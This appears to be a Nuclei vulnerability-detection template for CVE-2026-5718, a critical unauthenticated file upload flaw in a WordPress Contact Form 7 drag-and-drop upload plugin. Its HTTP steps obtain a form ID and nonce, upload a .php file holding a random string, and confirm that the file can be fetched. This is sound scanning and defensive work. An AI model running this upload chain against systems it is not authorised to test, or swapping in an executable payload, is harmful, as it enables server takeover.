id: CVE-2026-5718 info: name: Drag and Drop Multiple File Upload - CF7 <= 1.3.9.6 - Remote Code Execution author: zer0p0int severity: critical description: | Drag and Drop Multiple File Upload for Contact Form 7 WordPress plugin <= 1.3.9.6 contains an unrestricted file upload caused by insufficient file type validation and bypass of filename sanitization with non-ASCII characters, letting unauthenticated attackers upload arbitrary files and achieve remote code execution. impact: | Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise. remediation: | Update to the latest version beyond 1.3.9.6. reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-5718 - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-5718 epss-score: 0.04249 epss-percentile: 0.89047 cwe-id: CWE-434 metadata: verified: true max-request: 5 vendor: codedropz product: drag-and-drop-multiple-file-upload-contact-form-7 publicwww-query: "/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/" tags: cve,cve2026,wordpress,wp-plugin,file-upload,rce,intrusive,unauth,vkev variables: string: "{{randstr}}" filename: "{{to_lower(rand_text_alpha(6))}}" flow: http(1) && http(2) && http(3) && http(4) http: - method: GET path: - "{{BaseURL}}/" - "{{BaseURL}}/contact" - "{{BaseURL}}/contact-us" stop-at-first-match: true host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "_wpcf7")' internal: true condition: and extractors: - type: regex name: form_id group: 1 part: body regex: - '_wpcf7"(?:[^>]*value="|:)(\d+)' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=_wpcf7_check_nonce matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "\"data\"")' internal: true condition: and extractors: - type: regex name: nonce group: 1 part: body regex: - '"data":"([a-f0-9]+)"' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------cf7dndboundary -----------------------------cf7dndboundary Content-Disposition: form-data; name="action" dnd_codedropz_upload -----------------------------cf7dndboundary Content-Disposition: form-data; name="security" {{nonce}} -----------------------------cf7dndboundary Content-Disposition: form-data; name="form_id" {{form_id}} -----------------------------cf7dndboundary Content-Disposition: form-data; name="upload_name" upload-file -----------------------------cf7dndboundary Content-Disposition: form-data; name="upload-file"; filename="{{filename}}.php" Content-Type: application/octet-stream {{string}} -----------------------------cf7dndboundary-- matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "\"success\":true", "\"file\"")' internal: true condition: and extractors: - type: regex name: renamed group: 1 part: body regex: - '"file":"([^"]+)"' internal: true - type: regex name: path group: 1 part: body regex: - '"path":"([^"]+)"' internal: true - method: GET path: - "{{BaseURL}}/wp-content/uploads/wp_dndcf7_uploads/{{path}}/{{renamed}}" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, string)' condition: and # digest: 490a0046304402205b1cca07cfc4b32465cc4091ad50cf728bf567c89bcdf2dc212123c66f90b37d022053412c0afdbe7cd4b8f60901c1517a8f79fc1b8c846f73454bf1d7c990710dbf:922c64590222798bb761d5b6d8e72950